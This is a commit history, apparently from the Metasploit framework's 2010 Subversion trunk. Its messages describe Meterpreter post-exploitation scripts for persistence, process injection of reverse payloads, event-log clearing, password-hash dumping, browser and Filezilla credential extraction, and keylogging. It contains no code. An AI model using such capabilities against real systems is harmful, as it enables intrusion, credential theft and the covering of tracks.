Commit Graph

544 Commits (627fa786a57a1beac5baeb719492fd00a2ae11ab)

Author SHA1 Message Date
Joshua Drake e9fd935aa7 fix typo
git-svn-id: file:///home/svn/framework3/trunk@10856 4d416f70-5f16-0410-b530-b9f4589650da
2010-11-01 22:07:30 +00:00
Matt Weeks ca21c6df15 Add service option to persistence to keep escalated privileges through a reboot.
git-svn-id: file:///home/svn/framework3/trunk@10847 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-30 19:27:43 +00:00
cg 3b6d0177fd delete meter_inject.rb by request of carlos in the chan
git-svn-id: file:///home/svn/framework3/trunk@10838 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-28 01:06:37 +00:00
Carlos Perez 5fc38f15bb Keywords and removed un-used variable
git-svn-id: file:///home/svn/framework3/trunk@10837 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-28 00:42:16 +00:00
Carlos Perez c20326b829 Renamed meter_inject to multi_meter_inject, for single inbjections to memory use duplicate script, for multiple injection to diferent hosts use this one.
git-svn-id: file:///home/svn/framework3/trunk@10836 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-28 00:36:39 +00:00
Carlos Perez fc3df2303a Improvements thanks to jcran and some changes when used with sessions -s and AutoRunScript
git-svn-id: file:///home/svn/framework3/trunk@10826 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-26 02:30:08 +00:00
Carlos Perez 4054a21ec9 forgot to take debug puts
git-svn-id: file:///home/svn/framework3/trunk@10825 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-26 02:01:04 +00:00
Carlos Perez 60dcbcaa45 can now specify different versions of Reverse Meterpreter, multiple IPs and PIDs for multiple connections back, handler creation is now optional. Thanks to scriptjunkie for his duplicate script, this script is based on his work.
git-svn-id: file:///home/svn/framework3/trunk@10824 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-26 01:30:58 +00:00
Matt Weeks da3f263f2f Fix bug in duplicate script. Specifying target by PID should work now.
git-svn-id: file:///home/svn/framework3/trunk@10823 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-26 00:32:50 +00:00
Carlos Perez fcacbed530 Script for injecting in memory to another process given a PID or Process Name a Windows Meterpreter Reverse TCP payload
git-svn-id: file:///home/svn/framework3/trunk@10817 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-25 02:28:52 +00:00
Carlos Perez c4f9b60724 Script for EventLog Parsing, Enumeration and Clearing
git-svn-id: file:///home/svn/framework3/trunk@10816 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-25 02:26:59 +00:00
Carlos Perez ed53ac4cc8 Forgot meter_type var
git-svn-id: file:///home/svn/framework3/trunk@10815 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-25 02:21:31 +00:00
Carlos Perez 376088624c Script did not check for proper Meterpreter Platform
git-svn-id: file:///home/svn/framework3/trunk@10814 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-25 02:05:45 +00:00
Carlos Perez f77cdd1513 Script did not check for proper Meterpreter Platform
git-svn-id: file:///home/svn/framework3/trunk@10813 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-25 02:05:28 +00:00
Matt Weeks 31934868db Fix problem with incorrectly identifying vulnerable services.
git-svn-id: file:///home/svn/framework3/trunk@10796 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-23 20:14:28 +00:00
Carlos Perez ab2220f13d removed status printing and unused variables
git-svn-id: file:///home/svn/framework3/trunk@10793 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-23 14:40:49 +00:00
Joshua Drake 975cf8a741 move external files to a metasploit server
git-svn-id: file:///home/svn/framework3/trunk@10748 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-19 14:58:59 +00:00
Joshua Drake f997b37245 remove the kitrap0d meterpreter script in favor of the "getsystem" implementation, fixes #800, fixes #801
git-svn-id: file:///home/svn/framework3/trunk@10739 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-18 23:57:41 +00:00
Joshua Drake b364fc19a4 fix indent
git-svn-id: file:///home/svn/framework3/trunk@10738 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-18 23:23:45 +00:00
Joshua Drake 52260f47b1 add meterpreter scripts for deploying ssh client/server from illegal guy, closes #1728
git-svn-id: file:///home/svn/framework3/trunk@10737 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-18 23:20:24 +00:00
Joshua Drake 9ca53619f2 clean up meterpreter client object references, fixes #2987
git-svn-id: file:///home/svn/framework3/trunk@10732 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-18 20:26:18 +00:00
Carlos Perez a71ddb7b15 small typo
git-svn-id: file:///home/svn/framework3/trunk@10730 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-18 16:16:38 +00:00
HD Moore f88033f0cc Merge in R3L1K's Powershell enhancements and powerdump code (hashdump through powershell)
git-svn-id: file:///home/svn/framework3/trunk@10721 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-17 17:39:43 +00:00
HD Moore 893bc949f1 Fixes #2865 by merging in the submitted patch
git-svn-id: file:///home/svn/framework3/trunk@10715 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-16 22:07:29 +00:00
Matt Weeks 70774ba7cf Add script to escalate privs from most weak service permissions.
git-svn-id: file:///home/svn/framework3/trunk@10693 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-15 05:28:37 +00:00
Carlos Perez 4cb008be9c minor spelling error
git-svn-id: file:///home/svn/framework3/trunk@10664 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-13 01:06:15 +00:00
Carlos Perez 6a76865ca8 Google Chrome enumeration script with some minor modifications.
git-svn-id: file:///home/svn/framework3/trunk@10663 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-13 01:04:28 +00:00
Joshua Drake 19d5b4cd60 ignore comments/empty lines in rc
git-svn-id: file:///home/svn/framework3/trunk@10604 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-08 18:35:43 +00:00
Joshua Drake 9c54152d81 fail on errors
git-svn-id: file:///home/svn/framework3/trunk@10602 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-08 17:27:02 +00:00
Matt Weeks f04c1eddd2 Allow target specification by pid instead of name.
git-svn-id: file:///home/svn/framework3/trunk@10525 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-02 21:39:14 +00:00
Carlos Perez e91ec4dff4 smalll fix and added keywords
git-svn-id: file:///home/svn/framework3/trunk@10521 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-01 21:32:30 +00:00
Matt Weeks e01ec1670e Add script to spawn a new meterpreter session from another. Good for running keylogger in winlogon and explorer, insurance against crashes/AV, etc.
git-svn-id: file:///home/svn/framework3/trunk@10520 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-01 20:34:10 +00:00
Carlos Perez 01f8d6b4f6 Speeded up enumeration by making the key reads threaded
git-svn-id: file:///home/svn/framework3/trunk@10481 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-26 01:19:22 +00:00
Carlos Perez d5cc7dc81a Updated to use Mixin is_uac_enabled? check and the new is_admin? check
git-svn-id: file:///home/svn/framework3/trunk@10453 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-24 00:08:53 +00:00
Joshua Drake 291027ee1f swap each_line for each
git-svn-id: file:///home/svn/framework3/trunk@10437 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-22 22:23:23 +00:00
Carlos Perez 16ae3c84e9 fixes to the script for when multiple accounts are logged on on target and Meterpreter is running as system.
git-svn-id: file:///home/svn/framework3/trunk@10358 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-17 21:19:04 +00:00
Carlos Perez a5c92b7a52 small fix
git-svn-id: file:///home/svn/framework3/trunk@10353 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-17 20:53:34 +00:00
Carlos Perez 2207e7737a script for enumerating shares being offered, mounted share history and UNC paths entered in the Run Dialog on Windows target Hosts.
git-svn-id: file:///home/svn/framework3/trunk@10352 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-17 20:36:22 +00:00
Carlos Perez 8fc701dcbf Updated RegEx
git-svn-id: file:///home/svn/framework3/trunk@10351 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-17 20:36:02 +00:00
Carlos Perez 0a34941a79 Process name is no longer case sensitive.
git-svn-id: file:///home/svn/framework3/trunk@10346 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-17 11:46:16 +00:00
Carlos Perez 3c8f86b8c0 Added option to query process size in Kilobytes with -q option
git-svn-id: file:///home/svn/framework3/trunk@10345 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-17 02:37:43 +00:00
Carlos Perez 529f95e200 writes memory as it gets it to the dump file so as to improve memory usage
git-svn-id: file:///home/svn/framework3/trunk@10344 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-17 00:26:34 +00:00
Carlos Perez 1cb4d17df7 small fix
git-svn-id: file:///home/svn/framework3/trunk@10340 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-16 19:51:35 +00:00
Carlos Perez 930973cacb Added ability to take a list of processes to look for and dump their memory with the -r option
git-svn-id: file:///home/svn/framework3/trunk@10338 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-16 19:43:35 +00:00
Carlos Perez bb842ea0b0 I need a speel checker
git-svn-id: file:///home/svn/framework3/trunk@10336 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-16 18:01:01 +00:00
Carlos Perez ebabb6af8f Typo and added error message
git-svn-id: file:///home/svn/framework3/trunk@10335 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-16 17:47:13 +00:00
Carlos Perez 47c46b7c01 Script for dumping a process memory give its pid or all instances of the process given its name. Based on Attack Research Presentation at Black Hat
git-svn-id: file:///home/svn/framework3/trunk@10334 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-16 17:38:54 +00:00
Stephen Fewer 66052df646 Tiny update to these two scripts that use railgun - we don't need to perform a 'client.core.use("railgun")' any more as railgun is directly in stdapi.
git-svn-id: file:///home/svn/framework3/trunk@10321 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-14 23:33:38 +00:00
Carlos Perez 7d665e8a8d All scripts that are not platform dependednt will check for version, windows specific will only run on win32, win64 and some on PHP
git-svn-id: file:///home/svn/framework3/trunk@10277 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-09 16:09:27 +00:00
Carlos Perez 7019dd8bdb Print the right path for the saved data, false report on UAC and fixed program list extraction
git-svn-id: file:///home/svn/framework3/trunk@10268 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-09 00:36:44 +00:00
Carlos Perez ae5a3d388f Print the right path for the saved data
git-svn-id: file:///home/svn/framework3/trunk@10267 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-09 00:25:54 +00:00
Carlos Perez 4226b4910f Print the right path for the saved data and set the proper variable for options in help message
git-svn-id: file:///home/svn/framework3/trunk@10266 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-09 00:24:31 +00:00
Carlos Perez 161dd40463 Meterpreter version check, only supported at the moment on Windows targets withe win32 and win64 version of Meterpreter
git-svn-id: file:///home/svn/framework3/trunk@10250 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-06 20:12:34 +00:00
Carlos Perez d3ee74f3f9 Meterpreter version check, only supported at the moment on Windows targets withe win32 and win64 version of Meterpreter
git-svn-id: file:///home/svn/framework3/trunk@10249 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-06 20:10:24 +00:00
Carlos Perez 734dd76e22 Added check for proper Meterpreter version, since it depends on railgun
git-svn-id: file:///home/svn/framework3/trunk@10248 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-06 20:08:28 +00:00
Carlos Perez 3b3f787ff8 Proper exit call for when a unsupported version of Meterpreter is used
git-svn-id: file:///home/svn/framework3/trunk@10247 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-06 20:07:37 +00:00
Carlos Perez bb7ca297a9 now works with Linux and PHP Meterpreter
git-svn-id: file:///home/svn/framework3/trunk@10229 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-03 01:40:22 +00:00
Carlos Perez 1c45eba566 Error in variable declaration, minor output improvement
git-svn-id: file:///home/svn/framework3/trunk@10188 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-30 18:09:03 +00:00
Carlos Perez 4abb8d6b2d Meterpreter script for finding and saving name and path to file for easy selection and downloading those files.
git-svn-id: file:///home/svn/framework3/trunk@10186 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-30 01:55:53 +00:00
Tod Beardsley 2e84d222d3 Fixes #2434 by using the new report_auth_info API.
git-svn-id: file:///home/svn/framework3/trunk@10103 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-23 15:27:22 +00:00
Joshua Drake fce9a6404c correct regex again, see #2427
git-svn-id: file:///home/svn/framework3/trunk@10080 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-20 17:55:44 +00:00
Carlos Perez b7ec92ae1f Ticket #2427 Fixed regex in main part of the code and changed the UAC check to the one in the Meterpreter Mixin
git-svn-id: file:///home/svn/framework3/trunk@10079 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-20 13:07:41 +00:00
Joshua Drake 321f0ce8c3 fix regex and remove extra call to sysinfo, see #2354
git-svn-id: file:///home/svn/framework3/trunk@10046 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-18 23:05:55 +00:00
Tod Beardsley 0955e804df See #2412. Fixes the meterpreter script credcollect.rb and the plugin db_credcollect to use the new Creds table.
git-svn-id: file:///home/svn/framework3/trunk@10041 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-18 19:18:27 +00:00
Carlos Perez b403c787d6 will show help if wrong option given
git-svn-id: file:///home/svn/framework3/trunk@9995 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-13 11:45:54 +00:00
Carlos Perez 2789e9007e Fix for #2394
git-svn-id: file:///home/svn/framework3/trunk@9994 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-13 11:38:08 +00:00
Carlos Perez 6372b5f78d Thanks to Robin Wood for pointing out problems with the script, quick fix, will be porting the service manipulation to meterpreter mixin soon
git-svn-id: file:///home/svn/framework3/trunk@9988 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-13 00:34:15 +00:00
Carlos Perez 746721f862 Apply patch provided by Michael Messner to localize for German systems.
git-svn-id: file:///home/svn/framework3/trunk@9972 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-08 00:03:31 +00:00
Carlos Perez a2df95fda4 make sure it saves logs to proper folder
git-svn-id: file:///home/svn/framework3/trunk@9961 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-06 15:45:33 +00:00
Joshua Drake d8643568c8 fixes #2342
git-svn-id: file:///home/svn/framework3/trunk@9960 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-06 01:09:05 +00:00
Joshua Drake 8e4e0600db add missing quote, fixes #2331
git-svn-id: file:///home/svn/framework3/trunk@9954 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-04 02:05:35 +00:00
Carlos Perez 802014c306 fixed problem with option parsing
git-svn-id: file:///home/svn/framework3/trunk@9946 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-03 01:13:58 +00:00
Joshua Drake ff56230ef0 add LINEMAX option
git-svn-id: file:///home/svn/framework3/trunk@9844 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-16 18:39:30 +00:00
Carlos Perez f34454fc43 Added download of sigons.sqlite database
git-svn-id: file:///home/svn/framework3/trunk@9803 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-13 15:25:30 +00:00
James Lee b60e2d1022 convert lport to a string so we don't get failures when adding String + FixNum
git-svn-id: file:///home/svn/framework3/trunk@9801 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-13 09:01:36 +00:00
Tod Beardsley 501ac3d6e1 Adds a -D option to autoroute (kill all routes). Also includes minor cleanup on autoroute.
git-svn-id: file:///home/svn/framework3/trunk@9795 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-12 20:04:09 +00:00
Carlos Perez fdc22dabf6 Added error handling to m_exec function since some commands are not present on all versions of Windows
git-svn-id: file:///home/svn/framework3/trunk@9792 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-12 13:02:44 +00:00
James Lee a73a995e0f Scripts mustn't return.
git-svn-id: file:///home/svn/framework3/trunk@9780 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-11 17:34:03 +00:00
Carlos Perez 4efb7f4c1f Fixed false positive in OS detection do to bad regx
git-svn-id: file:///home/svn/framework3/trunk@9776 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-11 01:42:48 +00:00
Carlos Perez 5787ef30c0 Give more detail of what is happening when running with SYSTEM privs
git-svn-id: file:///home/svn/framework3/trunk@9775 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-11 01:32:13 +00:00
Carlos Perez 1add80fe24 fixed problems when running with SYSTEM privs
git-svn-id: file:///home/svn/framework3/trunk@9774 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-11 01:22:53 +00:00
Carlos Perez 3edac7bb7c fixed problems when running as SYSTEM and under Windows 2003 Systems
git-svn-id: file:///home/svn/framework3/trunk@9773 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-11 01:22:29 +00:00
Carlos Perez fd296af041 forgot to update option parsing
git-svn-id: file:///home/svn/framework3/trunk@9772 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-10 20:48:16 +00:00
Carlos Perez e2d3a84c50 re-named to enum_logged_on_users so as to fit more what it does
git-svn-id: file:///home/svn/framework3/trunk@9771 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-10 20:19:49 +00:00
Carlos Perez ddb599d7d0 Script for enumerating and downloading Firefox Databases on a Host
git-svn-id: file:///home/svn/framework3/trunk@9770 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-10 20:00:32 +00:00
Carlos Perez 200828e90a Script for enumerating VMWare products on a target host, including their settings and versions
git-svn-id: file:///home/svn/framework3/trunk@9769 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-10 17:03:11 +00:00
Carlos Perez 85ff4e22b9 refactor several calls to use now Meterpreter mixin
git-svn-id: file:///home/svn/framework3/trunk@9768 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-10 16:55:50 +00:00
Carlos Perez 4ff03fadb8 changed -c to -cl option do to conflict with sessions command
git-svn-id: file:///home/svn/framework3/trunk@9767 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-10 16:36:51 +00:00
Carlos Perez 5c4c4f92d0 Script for enumerating current logged on users and SID's for logged on accounts
git-svn-id: file:///home/svn/framework3/trunk@9765 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-10 15:19:11 +00:00
Carlos Perez 08aac797f5 resolved function name conflict with mixin
git-svn-id: file:///home/svn/framework3/trunk@9762 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-10 13:44:26 +00:00
Carlos Perez 16541abdde sent array instead of string to mixin call
git-svn-id: file:///home/svn/framework3/trunk@9740 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-08 20:31:26 +00:00
Carlos Perez 29c78e5c5c forgot to check for no arguments
git-svn-id: file:///home/svn/framework3/trunk@9738 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-08 20:09:39 +00:00
Carlos Perez c9e50d70a7 added check for UAC and account lockout using railgun for when capturing winlogon creds - Thanks for the API Call Mubix
git-svn-id: file:///home/svn/framework3/trunk@9734 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-08 17:27:01 +00:00
Carlos Perez 4d649045aa ARP Scanner Meterpreter Script using the railgun Extension, based on example provided in railgun manual.
git-svn-id: file:///home/svn/framework3/trunk@9733 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-08 14:24:24 +00:00
Carlos Perez 690a655275 Removed comma causing error in options
git-svn-id: file:///home/svn/framework3/trunk@9732 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-08 14:02:58 +00:00
Joshua Drake 5f2aa8bb0b consolidate aborted error messages
git-svn-id: file:///home/svn/framework3/trunk@9723 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-07 18:18:38 +00:00
Joshua Drake 1e0e92e5aa show commands that fail
git-svn-id: file:///home/svn/framework3/trunk@9721 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-07 18:04:22 +00:00
Mario Ceballos 348a03b4f9 add meterpreter script for panda av 2007
git-svn-id: file:///home/svn/framework3/trunk@9672 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-03 16:52:20 +00:00
Tod Beardsley 2250a83913 Updates meterpreter autoroute to accept CIDR notation.
git-svn-id: file:///home/svn/framework3/trunk@9667 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-03 01:27:24 +00:00
Tod Beardsley fb273e83a9 Updates autoroute to enforce sensible netmasks. This is serious business.
git-svn-id: file:///home/svn/framework3/trunk@9664 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-02 18:42:56 +00:00
Tod Beardsley 01139ed655 Adding an autoroute meterpreter script, and enabling route housekeeping to be stored and retrived via Sessions directly, rather than through Rex::Socket::SwitchBoard.
git-svn-id: file:///home/svn/framework3/trunk@9663 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-02 17:38:56 +00:00
Carlos Perez 9abea21a96 Meterpreter script to enumerare Powershell snap-ins and settings
git-svn-id: file:///home/svn/framework3/trunk@9658 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-02 00:10:45 +00:00
Carlos Perez 23651de9dd Script for enumerating recent and saved connections for Putty
git-svn-id: file:///home/svn/framework3/trunk@9640 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-01 00:43:16 +00:00
Carlos Perez 3ceed6bbb7 Script for extracting Filezilla saved credentials and connection settings
git-svn-id: file:///home/svn/framework3/trunk@9639 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-01 00:14:59 +00:00
Carlos Perez 2949ef2458 Fixed Bug #2163
git-svn-id: file:///home/svn/framework3/trunk@9635 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-30 00:20:04 +00:00
Joshua Drake 55487fbedc rescue even more!
git-svn-id: file:///home/svn/framework3/trunk@9591 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-23 03:09:55 +00:00
Joshua Drake 2fdf0a1123 rescue more, handle return from shell_command_token_win32 better, remove cmd delay since its not needed here, dont sleep before cleanup when aborting
git-svn-id: file:///home/svn/framework3/trunk@9590 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-23 02:27:58 +00:00
Carlos Perez ee1e9685aa Cosmetic changes, renamed mixin function and now all scripts that generate logs they are saved to .msf3/logs/scripts
git-svn-id: file:///home/svn/framework3/trunk@9589 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-23 00:52:25 +00:00
Carlos Perez ec0e8aba30 Cosmetic changes, renamed mixin function and now all scripts that generate logs they are saved to .msf3/logs/scripts
git-svn-id: file:///home/svn/framework3/trunk@9588 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-23 00:50:14 +00:00
Carlos Perez 8b27ca890c Script for extracting list of installed applications and their version
git-svn-id: file:///home/svn/framework3/trunk@9562 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-19 02:46:22 +00:00
Joshua Drake f3359c3485 adjust a couple $Id: outliers
git-svn-id: file:///home/svn/framework3/trunk@9535 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-16 17:03:30 +00:00
Carlos Perez d5c981f16e Now uses the new Meterpreter mixin and added option for persistence in HKCU for systems with UAC or limited privs
git-svn-id: file:///home/svn/framework3/trunk@9531 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-15 22:13:04 +00:00
Carlos Perez 02373c943c Now uses the new Meterpreter Mixin and both script generate cleanup scripts, also added support for french systems in getgui thanks to Adrien Guinault
git-svn-id: file:///home/svn/framework3/trunk@9530 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-15 22:11:48 +00:00
Carlos Perez 7aa1fd844f -c option conflicts with sessions own options when ran from the sessions command changed to -cl
git-svn-id: file:///home/svn/framework3/trunk@9507 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-13 01:23:52 +00:00
Carlos Perez c60767eb44 -c option conflicts with sessions own options when ran from the sessions command changed to -cl
git-svn-id: file:///home/svn/framework3/trunk@9506 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-13 01:23:23 +00:00
Carlos Perez f1e91fe0f5 -c option conflicts with sessions own options when ran from the sessions command changed to -cl
git-svn-id: file:///home/svn/framework3/trunk@9505 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-13 01:20:58 +00:00
Carlos Perez d0733635e5 Changed -s option on scripts to -rc due to conflict when ran from sessions command with -s option
git-svn-id: file:///home/svn/framework3/trunk@9439 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-06 02:43:25 +00:00
Carlos Perez f2f5ee66d9 Changed -s option on scripts to -rc due to conflict when ran from sessions command with -s option
git-svn-id: file:///home/svn/framework3/trunk@9438 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-06 02:43:07 +00:00
Carlos Perez 5438d970b1 Changed -s option on scripts to -rc due to conflict when ran from sessions command with -s option
git-svn-id: file:///home/svn/framework3/trunk@9437 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-06 02:42:52 +00:00
Carlos Perez 88a7d4b6ca Removed progress printing to standard out
git-svn-id: file:///home/svn/framework3/trunk@9436 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-06 02:35:25 +00:00
Joshua Drake f2197699da set decoder in spawn_meterpreter script, fixes #2050 -- thx ben
git-svn-id: file:///home/svn/framework3/trunk@9435 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-05 19:19:19 +00:00
Joshua Drake 6d1e7bdaa5 big commit - lots of cmdstager changes
created 4 cmd stagers (instead of just one): CmdStagerVBS, CmdStagerDebugAsm, CmdStagerDebugWrite, CmdStagerTFTP
created a TFTPServer mixin
created Msf::Exploit::EXE mixin to generate executables
updated all uses of CmdStager to use CmdStagerVBS for the time being
add exploit for cve-2001-0333 using CmdStagerTFTP
updated tftp server to wait for transfers to finish (up to 30 seconds) before shutting down
write debug.exe stager stub in 16-bit assembly (used in CmdStagerDebugAsm)


git-svn-id: file:///home/svn/framework3/trunk@9375 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-26 22:39:56 +00:00
HD Moore aa97b21e73 Fixes #1896. Applies a patch from grutz
git-svn-id: file:///home/svn/framework3/trunk@9302 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-14 16:00:27 +00:00
Carlos Perez 8c56b4c50d Comited wrong version of the script
git-svn-id: file:///home/svn/framework3/trunk@9250 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-08 04:23:07 +00:00
Carlos Perez d68fc77577 Sample script for retriving user and system enviroment variables
git-svn-id: file:///home/svn/framework3/trunk@9248 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-08 03:47:06 +00:00
Carlos Perez 895877bb57 Removed progress printing
git-svn-id: file:///home/svn/framework3/trunk@9235 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-05 23:45:34 +00:00
Joshua Drake 4bc86e603e fix a couple more silly regex mishaps
git-svn-id: file:///home/svn/framework3/trunk@9220 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-04 23:09:32 +00:00
James Lee 1fe426bcf5 look for the dot, too
git-svn-id: file:///home/svn/framework3/trunk@9219 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-04 23:06:25 +00:00
James Lee 2e926a1c22 make the extension check more generic
git-svn-id: file:///home/svn/framework3/trunk@9218 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-04 23:01:05 +00:00
Joshua Drake 81f9b0285f fix silly regex error when scanning extension
git-svn-id: file:///home/svn/framework3/trunk@9217 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-04 22:41:57 +00:00
Joshua Drake 0e72894e58 more cleanups
git-svn-id: file:///home/svn/framework3/trunk@9212 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-03 17:13:09 +00:00
Carlos Perez f6f88e90dc Added auto generation of cleanup scrit to persistance Meterpreter script
git-svn-id: file:///home/svn/framework3/trunk@9190 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-01 18:19:16 +00:00
Joshua Drake 71a5238e94 add migrate script for shell sessions -- just to warn
git-svn-id: file:///home/svn/framework3/trunk@9188 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-01 16:43:53 +00:00
Carlos Perez 086d71abb2 Removed progress status that is not so useful while it runs in background
git-svn-id: file:///home/svn/framework3/trunk@9186 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-01 12:41:40 +00:00
Joshua Drake e74d25ecc2 add svn:keywords property
git-svn-id: file:///home/svn/framework3/trunk@9137 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-26 02:50:58 +00:00
Carlos Perez ed4e19732f Fixed case for comparison
git-svn-id: file:///home/svn/framework3/trunk@9133 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-25 15:41:50 +00:00
Carlos Perez 6bbd76d959 Fixed problem when parsing accounts with spaces,dots and underscores
git-svn-id: file:///home/svn/framework3/trunk@9130 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-25 13:55:22 +00:00
Carlos Perez 4d0d06b1fb Script for generating Domain Admin Account list for use in token_hunter plugin
git-svn-id: file:///home/svn/framework3/trunk@9125 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-24 15:21:13 +00:00
Carlos Perez 393f7d6b26 Keylog Recorder scritp now records keystrokes to a text file instead of it's own sqlitedb
git-svn-id: file:///home/svn/framework3/trunk@9124 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-24 15:13:26 +00:00
Carlos Perez ae2d55e481 Minor fixes to multicommand script
